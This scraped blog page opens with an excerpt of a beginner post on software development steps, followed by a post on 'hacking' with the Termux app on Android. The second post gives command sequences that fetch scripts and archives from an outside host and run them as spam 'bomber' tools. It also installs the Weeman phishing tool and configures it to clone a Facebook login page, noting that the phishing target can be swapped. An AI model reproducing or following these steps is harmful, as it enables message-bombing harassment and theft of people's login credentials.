steps involved in software development      hello techies!!!   in our day to day  life we are using so many software,   today I gonna walk you through steps involved in the development of software or part of the software...    trust me it will help you a lot, if you are interested in programming, or wanna become a software developer     steps involved in software development      >>> communication :::>     >>>planning :::>   >>>:::> modeling:::>   >>>:::>construction:::>   >>>:::> testing:::>   >>>::: deployment and maintenance:::>   >>>::: maintaining:::>     here are a few steps I listed in the software development cycle   let me explain them one by one...     00) communication - it is the most important thing in any task ( project),   communication allows us to put our efforts together to achieve our goal.   in software development, the last member of our team should...
Posts
Showing posts from November, 2018
- Get link
- X
- Other Apps
 
   Hacking and penetration testing on android using termux app     >>> run exploits   >>> install tools   >>>git              TECH4YOU  fdSpam bom mall  $ pkg install update   $ pkg install upgrade   $ pkg install wget   $ pkg install php   $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip   $ unzip bom-mall.zip   $ cd bom-mall   $ php run.php  ••••••••••••••••••••••••••••••••  (```Install``` *SpamTsel*)   $ pkg install curl   $ pkg install php    $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php   $ chmod 777 bombtsel.php   $ php bombtsel.php  ••••••••••••••••••••••••••••••••  (```Install``` *Weeman* )    $ apt update && apt upgrade -y   $ apt install git -y    $ apt install python2 -y   $ git clone https://github.com/evait-security/weeman   $ cd weeman   $ chmod 777 weeman.py   $ python2 weeman.py    Contoh  $ set url http://facebook.com   $ set action_url http://facebook.com  run  (Bisa diganti phising nya, ...